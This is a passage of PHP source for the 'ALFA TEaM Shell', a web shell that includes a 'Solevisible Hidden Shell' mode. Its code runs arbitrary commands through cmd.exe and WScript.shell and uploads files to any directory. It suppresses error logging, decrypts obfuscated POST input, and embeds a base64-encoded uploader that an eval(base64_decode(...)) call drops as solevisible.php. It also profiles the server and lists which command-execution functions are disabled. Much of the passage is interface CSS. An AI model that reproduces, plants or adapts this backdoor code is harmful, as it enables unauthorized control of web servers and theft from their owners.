732$out=@stream_get_contents($pipes[1]);
733}elseif(class_exists('COM')){
734$alfaWs = new COM('WScript.shell');
735$exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
736$stdout = $exec->StdOut();
737$out=$stdout->ReadAll();
738}
739}catch(Exception $e){}
740return $out;
741}
742function _alfa_fsockopen($server,$uri,$post){
743 $socket = @fsockopen($server, 80, $errno, $errstr, 15);
744 if($socket){
745 $http = "POST {$uri} HTTP/1.0\r\n";
746 $http .= "Host: {$server}\r\n";
747 $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
748 $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
749 $http .= "Content-length: " . strlen($post) . "\r\n";
750 $http .= "Connection: close\r\n\r\n";
751 $http .= $post . "\r\n\r\n";
752 fwrite($socket, $http);
753 $contents = "";
754 while (!@feof($socket)) {
755 $contents .= @fgets($socket, 4096);
756 }
757 list($header, $body) = explode("\r\n\r\n", $contents, 2);
758 @fclose($socket);
759 return $body;
760 }else{
761 return "";
762 }
763}
764if(isset($_GET["solevisible"])){
765@error_reporting(E_ALL ^ E_NOTICE);
766echo '<html>';
767echo "<title>Solevisible Hidden Shell</title>";
768echo "<body bgcolor=#000000>";
769echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>';
770$safe_mode = @ini_get('safe_mode');
771if($safe_mode){$r = "<b style='color: red'>On</b>";}else{$r = "<b style='color: green'>Off</b>";}
772echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
773echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>";
774echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />";
775echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@getcwd()) . "/<br />";
776echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
777echo"<font color=#7CFC00>Disable functions : </font>";
778$disfun = @ini_get('disable_functions');
779if(empty($disfun)){$disfun = '<font color="green">NONE</font>';}
780echo"<font color=red>";
781echo "$disfun";
782echo"</font><br>";
783echo "<b style='color: #7CFC00'>Your Ip Address is : </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
784echo "<b style='color: #7CFC00'>Server Ip Address is : </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>";
785echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
786echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@getcwd()).'/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
787if(isset($_FILES['file'])){
788if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>'; }
789else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>'; }
790}
791echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>
792<hr><pre>';
793if(isset($_POST['command_solevisible'])){
794if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';
795$solevisible = "cd '".addslashes(str_replace("\\","/",@getcwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);
796echo alfaEx($solevisible);
797}
798echo'</pre>
799</body></html>';
800exit;}
801@error_reporting(E_ALL ^ E_NOTICE);
802@ini_set('error_log',NULL);
803@ini_set('log_errors',0);
804@ini_set('max_execution_time',0);
805@ini_set('magic_quotes_runtime', 0);
806@set_time_limit(0);
807if(function_exists('set_magic_quotes_runtime')){
808@set_magic_quotes_runtime(0);
809}
810foreach($_POST as $key => $value){
811if(is_array($_POST[$key])){
812$i=0;
813foreach($_POST[$key] as $f) {
814$f = trim(str_replace(' ', '+',$f));
815$_POST[$key][$i] = decrypt_post($f, _AlfaSecretKey());
816$i++;
817}
818}else{
819$value = trim(str_replace(' ', '+',$value));
820$_POST[$key] = decrypt_post($value, _AlfaSecretKey());
821}
822}
823$default_action = 'FilesMan';
824$default_use_ajax = true;
825$default_charset = 'Windows-1251';
826if(strtolower(substr(PHP_OS,0,3))=="win")
827$GLOBALS['sys']='win';
828else
829$GLOBALS['sys']='unix';
830$GLOBALS['home_cwd'] = @getcwd();
831if($_POST["a"] != "GetPathHistory"){
832 if($_SESSION[__LAST_CWD__]!=$_POST['c']){
833 $_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__];
834 }
835}
836$GLOBALS["need_to_update_header"] = "false";
837if(isset($_POST['c'])){
838if(!@chdir($_POST['c'])){
839 $GLOBALS['glob_chdir_false'] = true;
840}
841}
842$GLOBALS['cwd'] = (isset($_SESSION[__LAST_CWD__])&&$_SESSION[__LAST_CWD__]!=''&&!isset($_POST['c'])?$_SESSION[__LAST_CWD__]:@getcwd());
843if(!@is_dir){$GLOBALS['cwd'] = @getcwd();}
844if($GLOBALS['sys'] == 'win'){
845$GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
846$GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
847$_SESSION[__PATH_HISTORY__] = str_replace("\\", "/", $_SESSION[__PATH_HISTORY__]);
848}
849if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
850function alfaGetPathHistory(){echo (isset($_SESSION[__PATH_HISTORY__])&&!empty($_SESSION[__PATH_HISTORY__])?$_SESSION[__PATH_HISTORY__]: $GLOBALS['home_cwd']);}
851function alfahead(){
852if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
853$GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
854$alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
855define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
856define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
857if(!isset($_POST['ajax'])){
858function Alfa_GetDisable_Function(){
859$disfun = @ini_get('disable_functions');
860$afa = '<span class="header_show_all">All Functions Accessible</span>';
861if(empty($disfun))return($afa);
862$s = explode(',',$disfun);
863$s = array_unique($s);
864$i=0;
865$b=0;
866$func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
867$black_list = array();
868$allow_list = array();
869foreach($s as $d){
870 $d=trim($d);
871 if(empty($d)||!is_callable($d))continue;
872 if(!function_exists($d)){
873 if(in_array($d,$func)){
874 $dis .= $d." | ";$b++;
875 $black_list[] = $d;
876 }else{
877 $allow_list[] = $d;
878 }
879 $i++;
880 }
881}
882if($i==0)return($afa);
883if($i <= count($func)){
884$all = array_values(array_merge($black_list, $allow_list));
885return('<span class="disable_functions">'.implode(" | ", $all).'</span>');
886}
887return('<span class="disable_functions">'.$dis.'</span><a href=javascript:void(0) onclick="g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All ('.$i.')</span></a>');
888}
889function AlfaNum(){
890$args = func_get_args();
891$alfax = array();
892$find = array();
893for($i=1;$i<=10;$i++){
894$alfax[] = $i;
895}
896foreach($args as $arg){
897$find[] = $arg;
898}
899echo '<script>';
900foreach($alfax as $alfa){
901if(in_array($alfa,$find))
902continue;
903echo 'alfa'.$alfa."_=";
904}
905echo '""</script>';
906}
907if(empty($_POST['charset']))
908$_POST['charset'] = $GLOBALS['default_charset'];
909$freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
910$totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
911$totalSpace = $totalSpace?$totalSpace:1;
912$on="<span class='header_on'> ON </span>";
913$of="<span class='header_off'> OFF </span>";
914$none="<span class='header_none'> NONE </span>";
915if(function_exists('ssh2_connect'))
916$ssh2=$on;
917else
918$ssh2=$of;
919if(function_exists('curl_version'))
920$curl=$on;
921else
922$curl=$of;
923if(function_exists('mysql_get_client_info'))
924$mysql=$on;
925else
926$mysql=$of;
927if(function_exists('mssql_connect'))
928$mssql=$on;
929else
930$mssql=$of;
931if(function_exists('pg_connect'))
932$pg=$on;
933else
934$pg=$of;
935if(function_exists('oci_connect'))
936$or=$on;
937else
938$or=$of;
939if(@ini_get('disable_functions'))
940$disfun=@ini_get('disable_functions');
941else
942$disfun="All Functions Enable";
943if(@ini_get('safe_mode'))
944$safe_modes="<span class='header_off'>ON</span>";
945else
946$safe_modes="<span class='header_on'>OFF</span>";
947$cgi_shell="<span class='header_off' id='header_cgishell'>OFF</span>";
948if(@ini_get('open_basedir')){
949$basedir_data = @ini_get('open_basedir');
950if(strlen($basedir_data)>120){
951$open_b=substr($basedir_data,0, 120)."...";
952}else{
953$open_b = $basedir_data;
954}
955}else{$open_b=$none;}
956if(@ini_get('safe_mode_exec_dir'))
957$safe_exe=@ini_get('safe_mode_exec_dir');
958else
959$safe_exe=$none;
960if(@ini_get('safe_mode_include_dir'))
961$safe_include=@ini_get('safe_mode_include_dir');
962else
963$safe_include=$none;
964if(!function_exists('posix_getegid'))
965{
966$user = function_exists("get_current_user")?@get_current_user():"????";
967$uid = function_exists("getmyuid")?@getmyuid():"????";
968$gid = function_exists("getmygid")?@getmygid():"????";
969$group = "?";
970}else{
971$uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");
972$gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");
973$user = $uid['name'];
974$uid = $uid['uid'];
975$group = $gid['name'];
976$gid = $gid['gid'];
977}
978$cwd_links = '';
979$path = explode("/", $GLOBALS['cwd']);
980$n=count($path);
981for($i=0; $i<$n-1; $i++) {
982$cwd_links .= "<a class='header_pwd' href='javascript:void(0);' onclick='g(\"FilesMan\",\"";
983for($j=0; $j<=$i; $j++)
984$cwd_links .= $path[$j].'/';
985$cwd_links .= "\")'>".$path[$i]."/</a>";
986}
987$drives = "";
988foreach(range('a','z') as $drive)
989if(@is_dir($drive.':\\'))
990$drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
991$csscode =' -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
992echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
993<html xmlns="http://www.w3.org/1999/xhtml">
994<head>
995<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
996<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
997<link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
998<title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.' ::..</title>
999<link href="https://fonts.googleapis.com/css?family=Francois+One" rel="stylesheet">
1000<style type="text/css">
1001.hlabale {
1002 color: #67ABDF;
1003 border-radius: 4px;
1004 border: 1px solid #27979B;
1005 margin-left: 7px;
1006 padding: 2px;
1007}
1008#tbl_sympphp tr {
1009 text-align: center;
1010}
1011.editor-view {
1012 position: relative;
1013}
1014.view-content {
1015 position: absolute;
1016 overflow-y: auto;
1017 width: 100%;
1018 height: 475px;
1019}
1020*::-webkit-scrollbar-track {
1021 -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
1022 border-radius: 10px;
1023 background-color: #000115;
1024}
1025*::-webkit-scrollbar{
1026 width: 10px;
1027 background-color: #000115;
1028}
1029*::-webkit-scrollbar-thumb {
1030 border-radius: 10px;
1031 -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
1032 background-color: rgb(30, 130, 181);
1033}
1034.editor-file-name {
1035 margin-left: 29px;
1036 margin-top: 4px;
1037 overflow: hidden;
1038 text-overflow: ellipsis;
1039 white-space: nowrap;
1040}
1041.editor-icon {
1042 position: absolute;
1043}
1044.is_active {
1045 background: rgba(49, 55, 93, 0.77);
1046 border-radius: 10px;
1047}
1048.history-list {
1049 height: 88%;
1050 overflow-y: auto;
1051}
1052#editor-minimized,#cgiloader-minimized {
1053 display: block;
1054 position: fixed;
1055 right: -30px;
1056 width: 30px;
1057 height: 30px;
1058 top: 30%;
1059}
1060.minimized-wrapper {
1061 position: relative;
1062 background: rgb(14, 48, 74);
1063 width: 44px;
1064 height: 167px;
1065 cursor: pointer;
1066 border-bottom-left-radius: 5px;
1067 border-top-left-radius: 5px;
1068}
1069.minimized-text {
1070 transform: rotate(-90deg);
1071 color: wheat;
1072 font-size: x-large;
1073 display: inline-block;
1074 position: absolute;
1075 right: -51px;
1076 width: 129px;
1077 top: 50px;
1078 border-top-left-radius: 4%;
1079 height: 56px;
1080 padding: 3px
1081}
1082.close-button,.editor-minimize {
1083 height: 26px;
1084 width: 38px;
1085 right: 7px;
1086 background: rgb(29, 86, 115);
1087 cursor: pointer;
1088 position: absolute;
1089 box-sizing: border-box;
1090 line-height: 50px;
1091 display: inline-block;
1092 top: 17px;
1093 border-radius: 100px;
1094}
1095.editor-minimize {right: 50px;}
1096.close-button:before,.close-button:after,.editor-minimize:before {
1097 transform: rotate(-45deg);
1098 content: "";
1099 position: absolute;
1100 top: 63%;
1101 right: 6px;
1102 margin-top: -5px;
1103 margin-left: -25px;
1104 display: block;
1105 height: 4px;
1106 width: 27px;
1107 background-color: rgba(216, 207, 207, 0.75);
1108 transition: all 0.25s ease-out;
1109}
1110.editor-minimize:before{
1111 transform: rotate(0deg);
1112}
1113.close-button:after {
1114 transform: rotate(-135deg);
1115}
1116.close-button:hover:before,.close-button:hover:after,.editor-minimize:hover:before{
1117 background-color: red;
1118}
1119.close-button:hover,.editor-minimize:hover{
1120 background-color: rgba(39, 66, 80, 0.96);
1121}
1122#editor,#cgiloader {
1123 display: none;
1124 position: fixed;
1125 top: 0;
1126 width: 100%;
1127 height: 100%;
1128}
1129.editor-wrapper {
1130 width: 100%;
1131 height: 100%;
1132 position: relative;
1133 top: 1%;
1134}
1135.editor-header {
1136 width: 97%;
1137 background: rgba(21, 66, 88, 0.93);
1138 height: 37px;
1139 margin-left: 13px;
1140 position: relative;
1141 border-top-left-radius: 15px;
1142 border-top-right-radius: 15px;
1143}
1144.editor-path {
1145 position: absolute;
1146 font-size: x-large;
1147 margin-left: 10px;
1148 top: 6px;
1149 color: springgreen;
1150}
1151.editor-modal {
1152 position: relative;
1153 top: 0;
1154 background-color: rgba(0, 1, 23, 0.95);
1155 height: 90%;
1156 margin-left: 20%;
1157 margin-right: 2%;
1158 border: 2px #0e304a solid;
1159}
1160.editor-explorer {
1161 width: 19%;
1162 height: 90%;
1163 background-color: rgba(0, 1, 23, 0.94);
1164 position: absolute;
1165 z-index: 2;
1166 left: 1%;
1167 border: 2px rgb(14, 48, 74) solid;
1168}
1169.editor-controller {
1170 position: relative;
1171 top: -13px;
1172}
1173.file-holder {
1174 position: relative;
1175 width: 100%;
1176 height: 30px;
1177}
1178.file-holder > .history {
1179 position: absolute;
1180 color: rgb(3, 179, 163);
1181 cursor: pointer;
1182 left:5px;
1183 font-size: 18px;
1184 font-family: sans-serif;
1185 width:89%;
1186 height:100%;
1187 z-index: 3;
1188 border-radius: 10px;
1189 transition: background-color 600ms ease-out;
1190}
1191.file-holder > .history-close {
1192 display: block;
1193 opacity: 0;
1194 position: absolute;
1195 right: 2px;
1196 width: 20px;
1197 top: 4px;
1198 text-align: center;
1199 cursor: pointer;
1200 color: white;
1201 background: red;
1202 border-radius: 100px;
1203 font-family: monospace;
1204 z-index: 10;
1205 transition: opacity 600ms ease-out;
1206 font-size: 15px;
1207 height: 19px;
1208}
1209.file-holder > .history:hover {
1210 background-color: #646464;
1211}
1212.editor-explorer > .hheader {
1213 position: relative;
1214 color: rgb(20, 255, 7);
1215 border-bottom: 2px rgb(32, 106, 162) solid;
1216 text-align: center;
1217 font-family: sans-serif;
1218 margin-bottom: 10px;
1219 height: 55px;
1220}
1221.editor-search {
1222 position: absolute;
1223 bottom: 7px;
1224 left: 31px;
1225}
1226.hheader-text {
1227 position: absolute;
1228 left: 8px;
1229 top: 2px;
1230}
1231.history-clear {
1232 position: absolute;
1233 right: 8px;
1234 top: 2px;
1235 cursor: pointer;
1236}
1237.editor-body {
1238 position: relative;
1239 margin-left: 3px;
1240}
1241.editor-anim-close {
1242 '.showAnimation("editorClose").'
1243}
1244@keyframes editorClose {
1245 0% {
1246 transform: scale(1);
1247 opacity: 1;
1248 }
1249 100% {
1250 transform: scale(0);
1251 opacity: 0;
1252 }
1253}
1254.editor-anim-minimize {
1255 '.showAnimation("editorMinimize").'
1256}
1257@keyframes editorMinimize {
1258 0% {
1259 right:0px;
1260 opacity: 1;
1261 }
1262 100% {
1263 right: -2000px;
1264 opacity: 0;
1265 }
1266}
1267.editor-anim-show {
1268 '.showAnimation("editorShow").'
1269}
1270@keyframes editorShow {
1271 0% {
1272 right:-2000px;
1273 opacity: 0;
1274 }
1275 100% {
1276 right: 0px;
1277 opacity: 1;
1278 }
1279}
1280.minimized-show {
1281 '.showAnimation("minimizeShow").'
1282}
1283@keyframes minimizeShow {
1284 0% {
1285 right: -30px;
1286 opacity: 0;
1287 }
1288 100% {
1289 right: 0px;
1290 opacity: 1;
1291 }
1292}
1293.minimized-hide {
1294 '.showAnimation("minimizeHide").'
1295}
1296@keyframes minimizeHide {
1297 0% {
1298 right: 0px;
1299 opacity: 1;
1300 }
1301 100% {
1302 right: -30px;
1303 opacity: 0;
1304 }
1305}
1306.solevisible-text:hover {
1307 -webkit-text-shadow: 0px 0px 25px #00FF00;
1308 -moz-text-shadow: 0px 0px 25px #00FF00;
1309 -ms-text-shadow: 0px 0px 25px #00FF00;
1310 text-shadow: 0px 0px 25px #00FF00;
1311}
1312.update-holder {
1313 position: fixed;
1314 top: 0;
1315 background-color: rgba(0, 24, 29, 0.72);
1316 width: 100%;
1317 height: 100%;
1318}
1319.update-partner {
1320 width: 50%;
1321 position: relative;
1322 border-radius: 31px;
1323 height: 200px;
1324 background-color: rgba(3, 3, 41, 0.47);
1325 text-align: center;
1326 color: rgba(252, 253, 251, 0.88);
1327 margin-left: 25%;
1328 top: 23%;
1329 font-family: "Francois One", sans-serif;
1330}
1331.update-partner:hover {
1332-webkit-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
1333-moz-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
1334box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
1335}
1336.update-content {
1337 position: relative;
1338}
1339.update-content > a {
1340 text-decoration: none;
1341 position: absolute;
1342 color: rgba(103, 167, 47, 0.77);
1343 left: 24%;
1344 margin-top: 7%;
1345 font-size: 40px;
1346 font-family: "Francois One", sans-serif;
1347}
1348.update-close {
1349 position: absolute;
1350 right: 0;
1351 margin-right: 23px;
1352 top: 10px;
1353 font-size: 27px;
1354 background-color: #130f50;
1355 width: 5%;
1356 border-radius: 100px;
1357 cursor: pointer;
1358 border: 2px rgb(14, 38, 90) solid;
1359}
1360.update-close:hover {
1361 border: 2px #25ff00 solid;
1362 color: #FF0000;
1363}
1364.filestools {
1365 height: auto;
1366 width: auto;
1367 color: #67ABDF;
1368 font-size: 12px;
1369 font-family: Verdana,Geneva,sans-serif;
1370}
1371@-moz-document url-prefix() {
1372 #search-input {
1373 width: 173px;
1374 }
1375 .editor-path {
1376 top:3px;
1377 }
1378}
1379@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
1380@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
1381@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
1382@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
1383#alfaloader{'.$csscode.'width:100px;height:100px;}
1384#a_loader{'.$csscode.'width:150px;height:150px;position:fixed;z-index:999999;top: 42%;left: 45%;display:none;}
1385.ajaxarea{border:1px solid #0E304A;color:#67ABDF}#up_bar{background-color:red;width:0;height:2px;display:none;position:fixed;z-index:100000}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:'.alfa_getColor("header_values").';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;border:1px solid #0F0;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url('.__showicon('btn').');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 